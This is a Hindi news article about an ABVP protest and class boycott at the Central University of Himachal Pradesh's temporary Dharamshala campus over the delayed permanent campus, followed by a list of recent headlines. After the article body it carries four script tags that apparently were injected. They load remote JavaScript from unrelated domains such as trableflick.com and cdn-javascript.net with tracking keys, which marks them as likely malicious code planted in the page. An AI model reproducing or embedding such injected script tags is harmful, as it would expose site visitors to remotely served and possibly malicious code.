Categories: हिमाचल

ABVP ने सीयू के स्थाई निर्माण को लेकर धर्मशाला के अस्थाई कैंपस में जड़े ताले, कक्षाओं का किया बहिष्कार

<p>हिमाचल प्रदेश केंद्रीय विश्वविद्यालय के स्थायी कैंपस की मांग को लेकर आज एबीवीपी ने धर्मशाला कैंपस में ताला जड़कर कक्षाओं का बहिष्कार कर दिया। इस दौरान क्रमिक भूख हड़ताल पर बैठे एबीवीपी कार्यकर्ताओं ने केंद्र और प्रदेश सरकार के खिलाफ जमकर नारेबाजी की। बताया जा रहा है कि सीयू के देहरा और शाहपुर कैंपस में छात्रों ने कक्षाओं की बहिष्कार कर दिया है।&nbsp;</p>

<p>एबीवीपी कार्यकर्ताओं का आरोप है कि हमारा आंदोलन जारी है, लेकिन अभी तक सीयू प्रशासन की ओर से किसी ने उनसे मिलने की जहमत नहीं उठाई है। सरकार भी इस मामले पर चुप्पी साध कर बैठी हुई है। स्थायी कैंपस निर्माण को लेकर सरकार ने कोई स्थिति स्पष्ट नहीं की है कि कब तक स्थायी कैंपस निर्माण होगा। एबीवीपी ने सरकार को चेताया है कि यदि अतिशीघ्र उनकी मांगों पर गौर नहीं किया गया तो आंदोलन को और तेज़ किया जाएगा।</p>

<p>इस बात पर एबीवीपी के प्रांत मंत्री राहुल राणा ने कहा कि सीयू हिमाचल प्रदेश में स्टूडेंटस मूलभूत सुविधाओं की कमी में पढ़ाई करने को मजबूर हैं। 15 सौ के लगभग स्टूडेंटस पढ़ रहे हैं, जिनका भविष्य अंधकार की ओर धकेलने का काम सीयू प्रशासन कर रहा है। 11 साल होने को हैं, लेकिन अभी तक स्थायी सीयू कैंपस निर्माण की दिशा में कुछ नहीं हुआ है।</p>

<p>लोकसभा चुनावों से पहले केंद्रीय एचआरडी मंत्री ने शिलान्यास की जुमबलेबाजी करते हुए वोट बैंक की राजनीति की। देश भर में सीयू के दो-दो कैंपस स्थापित हो चुके हैं, जबकि हिमाचल में स्कूल से भी बद्दतर हालत बने हुए हैं।</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1581928941051″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

रावण का दहन, मुख्यमंत्री सुक्खू ने दिया सौहार्द और विकास का संदेश

  Dussehra: हिमाचल में दशहरा हर्षोल्‍लास के साथ मनाया गया। शिमला सहित सोलन, मंडी, कांगड़ा,…

6 mins ago

खाटू श्याम धाम के लिए एचआरटीसी बस सेवा नवंबर से फिर शुरू

HRTC bus to Khatu Shyam: प्रसिद्ध खाटू श्याम धाम को जाने वाली प्रदेश की एकमात्र…

35 mins ago

52 साल बाद चूड़धार में शांत महायज्ञ, 28,000 भक्त बने साक्षी

  Shrigul Maharaj temple ceremony: चूड़धार स्थित शिरगुल महाराज के पवित्र मंदिर में शुक्रवार को…

51 mins ago

HRTC की स्वर्ण जयंती पर कर्मचारियों के लिए बड़ा तोहफा, 4% DA के साथ 50 करोड़ ओवरटाइम भुगतान

HRTC golden jubilee announcements: हिमाचल पथ परिवहन निगम (HRTC) ने अपने 50 वर्षों के सफर…

1 hour ago

Shimla: विजयादशमी पर सिंदूर की होली, महिलाओं ने दी मां दुर्गा को विदाई

Kalibari Temple Durga prayers: देशभर में विजयादशमी का पर्व धूमधाम से मनाया जा रहा है,…

1 hour ago

हिमाचल में भूकंप: शिमला में 3.0 तीव्रता के झटके

EarthquakeTremors:  हिमाचल प्रदेश के शिमला और आसपास के क्षेत्रों में आज दोपहर 3:32 बजे भूकंप…

2 hours ago